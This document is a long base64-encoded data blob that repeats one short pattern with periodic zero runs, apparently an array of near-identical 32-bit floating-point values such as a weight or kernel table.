fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1f